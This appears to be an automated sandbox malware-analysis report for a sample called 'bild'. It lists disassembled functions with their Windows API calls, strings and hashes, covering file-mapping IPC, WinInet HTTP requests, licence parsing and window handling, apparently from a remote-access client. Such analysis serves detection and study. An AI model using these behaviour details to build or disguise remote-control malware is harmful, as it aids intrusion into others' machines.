61415 11133c6d 61412->61415 61413->61412 61419 1105dd10 191 API calls 61413->61419 
61414->61415 61416 11133c77 FreeLibrary 61415->61416 61417 11133c7a 61415->61417 61416->61417 61417->61383 61418 11133c81 FreeLibrary 61417->61418 61418->61383 61420 11133bce 61419->61420 61421 1105dd10 191 API calls 61420->61421 61422 11133bf6 61421->61422 61423 1105dd10 191 API calls 61422->61423 61424 11133c1d 61423->61424 61425 1105dd10 191 API calls 61424->61425 61426 11133c44 61425->61426 61426->61412 61427 11133c55 61426->61427 61631 11027780 395 API calls 2 library calls 61427->61631 61431 1113342d 61429->61431 61430 111338e9 61430->61256 61430->61323 61528 11138c30 61430->61528 61431->61430 61432 110d1550 395 API calls 61431->61432 61433 1113348e 61432->61433 61434 110d1550 395 API calls 61433->61434 61435 11133499 61434->61435 61436 111334c7 61435->61436 61437 111334de 61435->61437 61632 11029450 395 API calls 2 library calls 61436->61632 61439 11146450 std::locale::facet::_Facet_Register 21 API calls 61437->61439 61441 111334ec 61439->61441 61442 11133505 61441->61442 61443 1113351c 61441->61443 61633 11029450 395 API calls 2 library calls 61442->61633 61445 11081bb0 200 API calls 61443->61445 61447 1113352a 61445->61447 61448 11133541 61447->61448 61634 11009450 395 API calls std::locale::facet::_Facet_Register 61447->61634 61449 11146450 std::locale::facet::_Facet_Register 21 API calls 61448->61449 61454 111335e5 61448->61454 61451 11133556 61449->61451 61451->61454 61455 11146450 std::locale::facet::_Facet_Register 21 API calls 61451->61455 61452 1113353b 61453 11081a70 IsDBCSLeadByte 61452->61453 61453->61448 61456 11146450 std::locale::facet::_Facet_Register 21 API calls 61454->61456 61471 1113368e 61454->61471 61457 11133580 61455->61457 61465 111335f7 61456->61465 61635 110ed7a0 RegCloseKey 61457->61635 61459 110ed1a0 2 API calls 61459->61465 61460 11133598 61636 110ed430 399 API calls 2 library calls 61460->61636 61462 111335a9 61637 1102a0b0 395 API calls std::locale::facet::_Facet_Register 61462->61637 61465->61459 61467 1113365b 61465->61467 
61465->61471 61639 110ed430 399 API calls 2 library calls 61465->61639 61466 111335b3 61468 11146450 std::locale::facet::_Facet_Register 21 API calls 61466->61468 61469 111335ca 61466->61469 61467->61465 61640 11029450 395 API calls 2 library calls 61467->61640 61468->61469 61469->61454 61638 1102a0b0 395 API calls std::locale::facet::_Facet_Register 61469->61638 61472 111336c1 61471->61472 61473 111336aa 61471->61473 61476 111336be 61472->61476 61479 111336ec 61472->61479 61484 11133734 61472->61484 61641 11029450 395 API calls 2 library calls 61473->61641 61476->61472 61642 11029450 395 API calls 2 library calls 61476->61642 61477 111337cc 61480 11133816 61477->61480 61481 111337ff 61477->61481 61478 11133780 _free 61482 11133798 61478->61482 61485 11081b40 std::locale::facet::_Facet_Register IsDBCSLeadByte 61479->61485 61495 11133813 61480->61495 61505 11133845 61480->61505 61515 111338a1 61480->61515 61647 11029450 395 API calls 2 library calls 61481->61647 61488 111337b3 61482->61488 61489 1113379c 61482->61489 61484->61477 61484->61478 61491 11133752 61484->61491 61492 11133769 61484->61492 61486 111336f7 61485->61486 61486->61484 61508 11133725 61486->61508 61509 1113370e 61486->61509 61497 11163cf8 __strdup 67 API calls 61488->61497 61646 11029450 395 API calls 2 library calls 61489->61646 61645 11029450 395 API calls 2 library calls 61491->61645 61493 11081bb0 200 API calls 61492->61493 61500 11133779 61493->61500 61494 110d07c0 396 API calls 61501 111338da 61494->61501 61495->61480 61648 11029450 395 API calls 2 library calls 61495->61648 61503 111337bc 61497->61503 61500->61477 61500->61478 61504 110d07c0 396 API calls 61501->61504 61506 11146450 std::locale::facet::_Facet_Register 21 API calls 61503->61506 61504->61430 61507 11081bb0 200 API calls 61505->61507 61506->61477 61511 11133853 61507->61511 61644 110d0800 395 API calls 2 library calls 61508->61644 61643 11029450 395 API calls 2 library calls 61509->61643 61511->61515 61517 11133868 

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 1109D440: GetCurrentProcess.KERNEL32(000F01FF,?,11030063,00000000,00000000,00080000,420B7E12,00080000,00000000,00000000), ref: 1109D46D
                                                                                      • Part of subcall function 1109D440: OpenProcessToken.ADVAPI32(00000000), ref: 1109D474
                                                                                      • Part of subcall function 1109D440: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D485
                                                                                      • Part of subcall function 1109D440: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D4A9
                                                                                    • LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,420B7E12,00080000,00000000,00000000), ref: 1109E225
                                                                                    • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 1109E23E
                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 1109E249
                                                                                    • GetVersionExA.KERNEL32(?), ref: 1109E260
                                                                                    • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E2CE
                                                                                    • SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 1109E2E3
                                                                                    • FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E2F4
                                                                                    • CreateFileMappingA.KERNEL32(000000FF,11030063,00000004,00000000,?,?), ref: 1109E330
                                                                                    • GetLastError.KERNEL32 ref: 1109E33D
                                                                                    • LocalFree.KERNEL32(?), ref: 1109E366
                                                                                    • LocalFree.KERNEL32(?), ref: 1109E373
                                                                                    • GetLastError.KERNEL32 ref: 1109E390
                                                                                    • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 1109E3AE
                                                                                    • LocalFree.KERNEL32(?), ref: 1109E3D9
                                                                                    • LocalFree.KERNEL32(?), ref: 1109E3E6
                                                                                      • Part of subcall function 1109D3A0: LoadLibraryA.KERNEL32(Advapi32.dll,00000000,1109E27E), ref: 1109D3A8
                                                                                      • Part of subcall function 1109D3F0: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109D404
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E412
                                                                                    • LocalFree.KERNEL32(?), ref: 1109E4DB
                                                                                    • LocalFree.KERNEL32(?), ref: 1109E4E8
                                                                                    • _memset.LIBCMT ref: 1109E500
                                                                                    • GetTickCount.KERNEL32 ref: 1109E508
                                                                                    • GetCurrentProcessId.KERNEL32 ref: 1109E5B4
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E5CF
                                                                                    • CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 1109E61B
                                                                                    • GetLastError.KERNEL32 ref: 1109E624
                                                                                    • GetLastError.KERNEL32(00000000), ref: 1109E62B
                                                                                    • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109E660
                                                                                    • GetLastError.KERNEL32 ref: 1109E669
                                                                                    • GetLastError.KERNEL32(00000000), ref: 1109E670
                                                                                    • CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 1109E6A6
                                                                                    • GetLastError.KERNEL32 ref: 1109E6AF
                                                                                    • GetLastError.KERNEL32(00000000), ref: 1109E6B6
                                                                                    • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109E6EB
                                                                                    • GetLastError.KERNEL32 ref: 1109E6FA
                                                                                    • GetLastError.KERNEL32(00000000), ref: 1109E6FD
                                                                                    • LocalFree.KERNEL32(?), ref: 1109E725
                                                                                    • LocalFree.KERNEL32(?), ref: 1109E732
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 1109E763
                                                                                    • CreateThread.KERNEL32(00000000,00002000,Function_0009DD20,00000000,00000000,00000030), ref: 1109E77D
                                                                                    • ResetEvent.KERNEL32(?), ref: 1109E7AC
                                                                                    • ResetEvent.KERNEL32(?), ref: 1109E7B2
                                                                                    • ResetEvent.KERNEL32(?), ref: 1109E7B8
                                                                                    • SetEvent.KERNEL32(?), ref: 1109E7BE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView_memset
                                                                                    • String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists
                                                                                    • API String ID: 3291243470-2792520954
                                                                                    • Opcode ID: e1e4d2c24c486b94928180782bcaf8fbecda1daffafc4b641c279d7d38800a12
                                                                                    • Instruction ID: e0f3534def007632db5cc521867dfefedb1bc63d92e862916d16df31d0e36df5
                                                                                    • Opcode Fuzzy Hash: e1e4d2c24c486b94928180782bcaf8fbecda1daffafc4b641c279d7d38800a12
                                                                                    • Instruction Fuzzy Hash: 221282B590026D9FE724DF61CCD4EAEF7BABB88308F0049A9E11997244D771AD84CF51

                                                                                    Control-flow Graph

                                                                                    control_flow_graph: function at 11029590 (graph rendered in the original report; raw edge data omitted)
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(WinInet.dll,420B7E12,74DF23A0,?,00000000), ref: 110295C5
                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102965F
                                                                                    • SetLastError.KERNEL32(00000078), ref: 11029673
                                                                                    • _malloc.LIBCMT ref: 11029697
                                                                                    • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 110296B1
                                                                                    • GetLastError.KERNEL32 ref: 110296D2
                                                                                    • _free.LIBCMT ref: 110296DE
                                                                                    • _malloc.LIBCMT ref: 110296E7
                                                                                    • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029701
                                                                                    • GetProcAddress.KERNEL32(?,InternetOpenA), ref: 1102973B
                                                                                    • InternetOpenA.WININET(11194244,?,?,000000FF,00000000), ref: 1102975A
                                                                                    • SetLastError.KERNEL32(00000078), ref: 11029764
                                                                                    • SetLastError.KERNEL32(00000078), ref: 11029771
                                                                                    • SetLastError.KERNEL32(00000078), ref: 1102977B
                                                                                    • _free.LIBCMT ref: 11029785
                                                                                      • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                      • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029805
                                                                                    • SetLastError.KERNEL32(00000078), ref: 1102981E
                                                                                    • GetProcAddress.KERNEL32(?,InternetConnectA), ref: 11029831
                                                                                    • InternetConnectA.WININET(000000FF,11199690,00000050,00000000,00000000,00000003,00000000,00000000), ref: 1102984E
                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102986A
                                                                                    • SetLastError.KERNEL32(00000078), ref: 11029883
                                                                                    • GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 110298A9
                                                                                    • GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 110298FD
                                                                                    • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 11029A63
                                                                                    • SetLastError.KERNEL32(00000078), ref: 11029B30
                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029B82
                                                                                    • SetLastError.KERNEL32(00000078), ref: 11029B99
                                                                                    • FreeLibrary.KERNEL32(?), ref: 11029BAA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$ErrorLast$FreeInternetLibrary_free_malloc$ConnectHeapLoadOpen
                                                                                    • String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
                                                                                    • API String ID: 921868004-913974648
                                                                                    • Opcode ID: 36508fb7aa93ad5402a0a829a6fade002c528e1580f22bfa2ed00e1b157900af
                                                                                    • Instruction ID: e81a0880bf89439be6f70403065d0babe3f5b16467f55efefddb7e1ac6149969
                                                                                    • Opcode Fuzzy Hash: 36508fb7aa93ad5402a0a829a6fade002c528e1580f22bfa2ed00e1b157900af
                                                                                    • Instruction Fuzzy Hash: 5E127FB0D04269EBEB11CFA9CC88A9EFBF9FF88754F604569E465E7240E7705940CB60
                                                                                    APIs
                                                                                      • Part of subcall function 11144EA0: GetLastError.KERNEL32(?,023CB898,000000FF,?), ref: 11144ED5
                                                                                      • Part of subcall function 11144EA0: Sleep.KERNEL32(000000C8,?,?,?,?,?,?,023CB898,000000FF,?), ref: 11144EE5
                                                                                    • _fgets.LIBCMT ref: 11061DC2
                                                                                    • _strpbrk.LIBCMT ref: 11061E29
                                                                                    • _fgets.LIBCMT ref: 11061F2C
                                                                                    • _strpbrk.LIBCMT ref: 11061FA3
                                                                                    • __wcstoui64.LIBCMT ref: 11061FBC
                                                                                    • _fgets.LIBCMT ref: 11062035
                                                                                    • _strpbrk.LIBCMT ref: 1106205B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _fgets_strpbrk$ErrorLastSleep__wcstoui64
                                                                                    • String ID: %c%04d%s$%s.%04d.%s$/- $?expirY$?starT$ACM$Client$Expired$_License$_checksum$_include$_version$cd_install$defaults$enforce$expiry$inactive$licensee$product$shrink_wrap$start
                                                                                    • API String ID: 716802716-1571441106
                                                                                    • Opcode ID: 32dce6010c3087015648dbee5c865c0eda81171851eef29cc693b610d01e18e4
                                                                                    • Instruction ID: 9b454a0e08db4b844aa329f9a873b431930d9d904307df7fc69ae15b9a8492e5
                                                                                    • Opcode Fuzzy Hash: 32dce6010c3087015648dbee5c865c0eda81171851eef29cc693b610d01e18e4
                                                                                    • Instruction Fuzzy Hash: 55A2D375E0461A9FEB21CF64CC80BEFB7B9AF44345F0041D9E849A7281EB71AA45CF61

                                                                                    Control-flow Graph

                                                                                    control_flow_graph: function at 11143570 (graph rendered in the original report; raw edge data omitted)
                                                                                    APIs
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,8504C483,74DF23A0), ref: 111435A3
                                                                                    • LoadLibraryA.KERNEL32(?), ref: 111435EC
                                                                                    • LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 11143605
                                                                                    • LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 11143614
                                                                                    • GetModuleHandleA.KERNEL32(?), ref: 1114361A
                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 1114362E
                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 1114364D
                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 11143658
                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 11143663
                                                                                    • GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 1114366E
                                                                                    • GetProcAddress.KERNEL32(00000000,StackWalk), ref: 11143679
                                                                                    • GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 11143684
                                                                                    • GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 1114368F
                                                                                    • GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 1114369A
                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 111436A5
                                                                                    • GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 111436B0
                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 111436BB
                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 111436C6
                                                                                    • GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 111436D1
                                                                                    • GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 111436DC
                                                                                      • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$LibraryLoad$Module$FileHandleName_strrchr
                                                                                    • String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll
                                                                                    • API String ID: 3874234733-2061581830
                                                                                    • Opcode ID: cfe4e0547bd5fe59c7f15dfeaa5816d95d94d48cef7707ac470bf4deacf2edb6
                                                                                    • Instruction ID: 707b91cc949213dae1a505c6abf15ec2f20ed18dfa7402eb99b54f6ccfa65761
                                                                                    • Opcode Fuzzy Hash: cfe4e0547bd5fe59c7f15dfeaa5816d95d94d48cef7707ac470bf4deacf2edb6
                                                                                    • Instruction Fuzzy Hash: 05411B70A04714AFD7309F768D84A6BFAF8BF55A04B10492EE496D3A10EBB5E8008F5D

                                                                                    Control-flow Graph

                                                                                    control_flow_graph: function at 11139090 (graph rendered in the original report; raw edge data omitted)
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 111390C7
                                                                                    • IsWindow.USER32(00030462), ref: 11139125
                                                                                    • IsWindowVisible.USER32(00030462), ref: 11139133
                                                                                    • IsWindowVisible.USER32(00030462), ref: 1113916B
                                                                                    • GetForegroundWindow.USER32 ref: 11139186
                                                                                    • EnableWindow.USER32(00030462,00000000), ref: 111391A0
                                                                                    • EnableWindow.USER32(00030462,00000001), ref: 111391BC
                                                                                    • SetForegroundWindow.USER32(00000000), ref: 111391CB
                                                                                    • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 11139209
                                                                                    • IsWindowVisible.USER32(00000000), ref: 11139218
                                                                                    • IsWindowVisible.USER32(00030462), ref: 11139248
                                                                                    • IsIconic.USER32(00030462), ref: 11139255
                                                                                    • GetForegroundWindow.USER32 ref: 1113925F
                                                                                      • Part of subcall function 11131210: ShowWindow.USER32(00030462,00000000,?,11139062,00000007,?,?,?,?,?,00000000), ref: 11131234
                                                                                      • Part of subcall function 11131210: ShowWindow.USER32(00030462,11139062,?,11139062,00000007,?,?,?,?,?,00000000), ref: 11131246
                                                                                    • SetForegroundWindow.USER32(00000000), ref: 11139285
                                                                                    • EnableWindow.USER32(00030462,00000001), ref: 11139294
                                                                                    • GetLastError.KERNEL32 ref: 11139353
                                                                                    • GetLastError.KERNEL32 ref: 111393CB
                                                                                    • GetTickCount.KERNEL32 ref: 11139678
                                                                                    • GetTickCount.KERNEL32 ref: 11139699
                                                                                      • Part of subcall function 11025BB0: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,111396E2), ref: 11025BB8
                                                                                    • FreeLibrary.KERNEL32(?,00000000,000000FF,00000000,00000001,00000000,00000001,00000000,0000000A,?,00000000), ref: 11139734
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Window$ForegroundVisible$Enable$CountErrorLastLibraryShowTick$CurrentFindFreeIconicLoadThread
                                                                                    • String ID: Audio$Client$File <%s> doesnt exist, e=%d$HideWhenIdle$HookDirectSound$MainWnd = %08x, visible %d, valid %d$NeedsReinstall$Reactivate main window$Shell_TrayWnd$ShowNeedsReinstall in 15, user=%s$disableRunplugin
                                                                                    • API String ID: 2511061093-2542869446
                                                                                    • Opcode ID: 0e4ccee009b06b63fab7a686928084bc30871ce576c3106fc105d812773a0109
                                                                                    • Instruction ID: 168a4b77644d94df8a921335772b55db7e1a21360cf08f879ca3086e41f0bcfd
                                                                                    • Opcode Fuzzy Hash: 0e4ccee009b06b63fab7a686928084bc30871ce576c3106fc105d812773a0109
                                                                                    • Instruction Fuzzy Hash: 700229B8A1062ADFE716DFA4CDD4B6AF766BBC071EF500178E4255728CEB30A844CB51
                                                                                    APIs
                                                                                    • CoInitialize.OLE32(00000000), ref: 11115BC5
                                                                                    • CoCreateInstance.OLE32(111C081C,00000000,00000001,111C082C,00000000,?,00000000,Client,silent,00000000,00000000,?,1104BADF), ref: 11115BDF
                                                                                    • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000000,Client,silent,00000000,00000000), ref: 11115C04
                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetSettings), ref: 11115C16
                                                                                    • SHGetSettings.SHELL32(?,00000200,?,00000000,Client,silent,00000000,00000000), ref: 11115C29
                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,Client,silent,00000000,00000000), ref: 11115C35
                                                                                    • CoUninitialize.COMBASE(00000000), ref: 11115CD1
                                                                                    Strings
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Library$AddressCreateFreeInitializeInstanceLoadProcSettingsUninitialize
                                                                                    • String ID: SHELL32.DLL$SHGetSettings
                                                                                    • API String ID: 4195908086-2348320231
                                                                                    • Opcode ID: 840c1eadb0258f47a734e7be087c5142de7588e2c7107701b0399a58d14c8a79
                                                                                    • Instruction ID: 591e2108fd72310e634c09c07143bf968b2bad8d72189eb08e80a39284cb5d12
                                                                                    • Opcode Fuzzy Hash: 840c1eadb0258f47a734e7be087c5142de7588e2c7107701b0399a58d14c8a79
                                                                                    • Instruction Fuzzy Hash: 1751A075A0020A9FDB40DFE5C9C4AAFFBB9FF89304F104629E516AB244E731A941CB61
                                                                                    APIs
                                                                                    Strings
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _memset
                                                                                    • String ID: NBCTL32.DLL$_License$serial_no
                                                                                    • API String ID: 2102423945-35127696
